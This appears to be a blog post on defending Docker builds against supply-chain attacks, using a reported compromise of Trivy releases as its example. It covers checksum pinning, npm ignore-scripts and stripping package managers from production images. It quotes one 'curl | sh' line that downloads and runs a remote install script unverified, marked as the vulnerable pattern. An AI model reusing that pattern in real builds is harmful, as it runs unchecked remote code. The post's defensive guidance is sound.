Your Dockerfile is downloading attackers' binaries (and how to stop it)
Three concrete steps to protect your Dockerfile from supply chain attacks: SHA256 checksum verification, controlling npm scripts with ignore-scripts, and removing the package manager from the production image.

On March 19, 2026, someone compromised the Trivy releases on GitHub. Versions v0.69.4, v0.69.5, and v0.69.6 were replaced with binaries containing a credential stealer. For four days, any CI/CD pipeline or Docker build that downloaded Trivy from the official releases page ran malicious code with enough permissions to read the entire container filesystem. The incident was tracked as CVE-2026-33634, with a CVSS score of 9.4.
Our Dockerfile was downloading Trivy latest. No verification. Every build fetched the newest binary from GitHub Releases and ran it directly. If we'd rebuilt the image during that four-day window, we would've installed the compromised binary without knowing it.
This article explains the three steps we applied in our project to close that vector and others like it in the npm pipeline. They're simple changes, you can put them in place in minutes, but they make the difference between a vulnerable build and one that can defend itself.
What a supply chain attack means in Docker
When you build a Docker image, you don't write all the code that ends up inside it. You download base images, install third-party binaries, run npm install, which pulls in hundreds of transitive dependencies. Every one of those steps trusts an external source.
A supply chain attack exploits that trust. Instead of attacking your code directly, the attacker compromises something your code consumes: a binary you download, an npm package you install, a tool you leave in the final image. You don't change anything in your repository, but your next build produces an image with malicious code in it.
In the context of Docker and Node.js, there are three main attack surfaces.
Binaries downloaded with curl. If you download an executable from the internet without verifying its integrity, any compromise of the source server (or a man-in-the-middle attack) can hand you a different binary than the one you expected.
npm scripts. Any package can define
postinstallorpreinstallscripts that run automatically duringnpm install. If a transitive dependency gets compromised, its script runs with your build's permissions.Unnecessary tools in production. Leaving npm, yarn, or corepack in the final image adds transitive dependencies you never use, but that still pile up vulnerabilities and expand the attack surface.
Each of these surfaces can be closed off with a specific step. Let's look at the three of them.
Checksum verification with the Trivy case
The real incident
The CVE-2026-33634 issue wasn't a sophisticated attack. Someone got access to a maintainer's credentials and used that access to replace the binaries in three consecutive Trivy releases on GitHub. The payload was a credential stealer that exfiltrated environment variables and configuration files from the container where it ran. In that same area, in secret management with Infisical we cover the other side of the problem.
The attack was active from March 19 to 23, 2026. Any pipeline that downloaded Trivy during that window, without pinning the version, installed the compromised binary. That includes thousands of CI/CD builds that use Trivy as a vulnerability scanner. Ironically, the security tool became the attack vector. As a complement, in a full security pipeline without an enterprise budget we cover the other side of the coin.
What we had before
Our Dockerfile downloaded Trivy using a very common pattern: detect the latest available version and download it directly.
# ❌ Patrón vulnerable: descarga la última versión sin verificar
RUN curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/binThis pattern has two problems. First, it doesn't pin the version, so each build can get a different binary, which breaks reproducibility. Second, it doesn't verify integrity, so if the downloaded binary has been tampered with, the build accepts it without complaint.
The fix: pinned version + SHA256
The fix has two parts: pin the exact binary version and verify its checksum before using it.
# --- Trivy downloader (pinned version + checksum verification) ---
# CVE-2026-33634: Trivy supply chain attack compromised v0.69.4-6.
# ALWAYS pin to a known-good version and verify the SHA256 checksum.
# To update: change TRIVY_VERSION and TRIVY_SHA256 below, then rebuild.
FROM base AS trivy-downloader
ARG TRIVY_VERSION=0.69.3
ARG TRIVY_SHA256=1816b632dfe529869c740c0913e36bd1629cb7688bd5634f4a858c1d57c88b75
RUN apt-get update && apt-get install -y --no-install-recommends curl ca-certificates && \
echo "Downloading Trivy v${TRIVY_VERSION}..." && \
curl -fL --retry 3 --retry-delay 5 -o /tmp/trivy.tar.gz \
https://github.com/aquasecurity/trivy/releases/download/v${TRIVY_VERSION}/trivy_${TRIVY_VERSION}_Linux-64bit.tar.gz && \
echo "${TRIVY_SHA256} /tmp/trivy.tar.gz" | sha256sum -c - && \
tar xzf /tmp/trivy.tar.gz -C /usr/local/bin trivy && \
rm -f /tmp/trivy.tar.gz && \
rm -rf /var/lib/apt/lists/*Let's go line by line.
ARG TRIVY_VERSION=0.69.3 pins the version to the last known release before the compromise. There's no ambiguity, every build downloads exactly this version.
ARG TRIVY_SHA256=... stores the SHA256 hash of the compressed file for that version. This hash is taken from a verified source before the compromise happened and committed directly into the Dockerfile.
echo "${TRIVY_SHA256} /tmp/trivy.tar.gz" | sha256sum -c - is the key line. It compares the hash of the downloaded file against the expected hash. If they don't match, the command fails with a non-zero exit code and the build stops immediately. There's no way for a tampered binary to get past this check unless someone also changes the hash in the Dockerfile, which requires access to your repository.
We use a multi-stage build with a dedicated stage (trivy-downloader) to download and verify the binary. The final runner only copies the verified executable with COPY --from=trivy-downloader. That keeps the download tools (curl, ca-certificates) out of the production image.
When you need to update Trivy, you only have to change the two ARG values and rebuild. The comment in the Dockerfile itself documents exactly what to do.
npm and install scripts, code you didn't ask to run
What postinstall and preinstall are
npm lets any package define scripts that run automatically during installation. The most common are preinstall (before install) and postinstall (after install). One legitimate use case is compiling native modules. better-sqlite3, for example, needs to run node-gyp to compile its C++ bindings during installation.
But this same mechanism is a known attack vector. If an attacker compromises an npm package, or one of its transitive dependencies, and adds a malicious postinstall, that script runs automatically on every npm install. You don't need to import the package in your code, and you don't need to call any function. As long as it's in your package-lock.json, its script runs with your build's permissions.
This isn't theoretical. Incidents like event-stream (2018), ua-parser-js (2021), and coa (2021) used exactly this mechanism to distribute malware through the npm registry.
ignore-scripts + selective rebuild
The fix is to disable all install scripts by default and explicitly enable only the ones you need.
First, we create a .npmrc at the project root.
ignore-scripts=trueThis disables all preinstall, postinstall, and prepare scripts for all dependencies, both locally and in CI. No package can run arbitrary code during installation.
In the Dockerfile, the dependency installation looks like this.
FROM base AS deps
WORKDIR /app
COPY package.json package-lock.json ./
RUN --mount=type=cache,target=/root/.npm npm ci --ignore-scripts && \
npm rebuild better-sqlite3npm ci --ignore-scripts installs all dependencies cleanly but doesn't run any scripts. The dependencies get copied into node_modules, but native modules are left uncompiled.
npm rebuild better-sqlite3 explicitly compiles only the native module we know needs it. This is the key step. Instead of letting hundreds of packages run arbitrary scripts, we rebuild only what we've audited and know is legitimate.
The principle is simple: deny by default, allow only what you've verified.
The local development flow
With ignore-scripts=true in .npmrc, local npm install doesn't run scripts either. That means better-sqlite3 doesn't compile automatically, and the app won't start until you compile it manually.
To keep the development flow simple, we added a postsetup script in package.json.
{
"scripts": {
"postsetup": "npm rebuild better-sqlite3 drizzle-kit"
}
}After cloning the project and running npm install, you just need to run npm run postsetup to compile the native modules. It's an explicit, deliberate step, not something that happens silently.
Removing the package manager from the production image
Why npm in production is a risk
A production image runs your app. It doesn't install packages, it doesn't run npm install, and it doesn't need a dependency manager. Still, the Node.js base image includes npm, yarn, and corepack by default, and with them come dozens of transitive dependencies.
Those dependencies have vulnerabilities of their own. If npm includes a vulnerable version of cross-spawn, glob, minimatch, or tar, your image inherits those vulnerabilities even if you never use them. Security scanners detect them and generate alerts that get mixed in with real vulnerabilities in your application, creating noise that makes it harder to prioritize what matters. From the security angle, in Hadolint and Dockle for static Dockerfile analysis we go deeper into this part.
How we remove it
In the runner stage of the Dockerfile, after copying the built application, we remove npm, yarn, and corepack.
# Strip npm, yarn, corepack from runner — not needed, and their transitive
# deps (cross-spawn, glob, minimatch, tar) carry HIGH CVEs
RUN rm -rf /usr/local/lib/node_modules/npm \
/usr/local/lib/node_modules/corepack \
/opt/yarn* \
/usr/local/bin/npm /usr/local/bin/npx \
/usr/local/bin/corepack \
/usr/local/bin/yarn /usr/local/bin/yarnpkgThis step goes at the end, after all npm ci and npm run build commands have finished in earlier stages of the multi-stage build. The runner stage only needs node to run server.js.
The result is a cleaner image, with fewer vulnerabilities reported by the scanner and without tools an attacker could use if they got access to the container.
The three layers as defense in depth
These three steps aren't alternatives to each other. They're complementary layers that protect different moments in the container lifecycle.
Checksum verification protects what you download. It guarantees that the binary you get from the internet is exactly the one you expect, with no modifications.
ignore-scripts protects what runs during installation. It stops unaudited code from running as part of the build.
Removing the package manager protects what remains in production. It reduces the attack surface of the final image and removes dependencies nobody uses.
Each layer stands on its own. If an attacker manages to bypass checksum verification, because they compromised the source before you pinned the hash, the scripts are still disabled. If a compromised package gets through without needing scripts, the package manager won't be available in production to download extra payloads.
This is defense in depth. One step isn't enough, because each one has its own blind spots. Putting all three together means a successful attack has to compromise multiple links at the same time.
What we learned
Never download a binary without verifying its checksum. It doesn't matter if it comes from GitHub, the project's official website, or a mirror. If you don't verify integrity, you're blindly trusting that nobody has tampered with the source. A sha256sum -c takes milliseconds and stops the build if something doesn't add up.
If a package needs postinstall, rebuild only that package. Most dependencies don't need to run scripts during installation. Disable scripts by default with ignore-scripts=true and explicitly compile only what you've audited.
Your production image doesn't need npm. If your CMD is node server.js, remove npm, yarn, and corepack from the runner. They're development tools, not production tools.
Vulnerability scanners are more useful when they don't have noise. Removing dependencies you don't use cuts irrelevant alerts and lets you focus on the real vulnerabilities in your application.
Every security layer you add means the next attack has to compromise one more link. No single step is foolproof. Security is built by stacking layers that complement each other.
Your container's security doesn't depend only on the code you write, but on the code you choose not to run. Verifying what you download, silencing what you haven't audited, and removing what you don't need are three decisions that take minutes and close attack vectors that can cost months of incident response.
Another entry in the Homelab security series. You came from Practical hardening for a Linux VPS and next up is Centralized secrets with Infisical in Dokploy.

Jose, author of the blog
QA Engineer. I write out loud about automation, AI and software architecture. If something here helped you, write to me and tell me about it.
Leave the first comment
What did you think? What would you add? Every comment sharpens the next post.
If you liked this

SSH vs Cloudflare Tunnel vs Pangolin vs Tailscale vs Headscale vs WireGuard, qué uso para qué
Tengo cloudflared en producción, Pangolin en plan para el home lab, Tailscale en el portátil y SSH tunnels abiertos varias veces al día. Desde fuera parecen alternativas que se pisan entre ellas, pero cada una resuelve un problema distinto. Aquí va el árbol de decisión que tengo en la cabeza para no acabar con seis cosas haciendo lo mismo.

OpenRouter vs Vercel AI Gateway vs Cloudflare vs Portkey vs LiteLLM, comparativa 2026
Comparativa transversal de AI Gateways en 2026 por ejes que pesan de verdad, catálogo, coste, latencia, observabilidad, failover, privacidad, operativa y lock-in. Cuándo elegir cada uno y por qué no son excluyentes.

Infisical en Dokploy: cómo gestionar secretos sin meterlos en variables de entorno
Las variables de entorno en texto plano son cómodas hasta que dejan de ser seguras. Explicamos cómo desplegamos Infisical como gestor de secretos self-hosted dentro de Dokploy y cómo conectamos nuestras aplicaciones para que lean las credenciales de forma cifrada y auditable.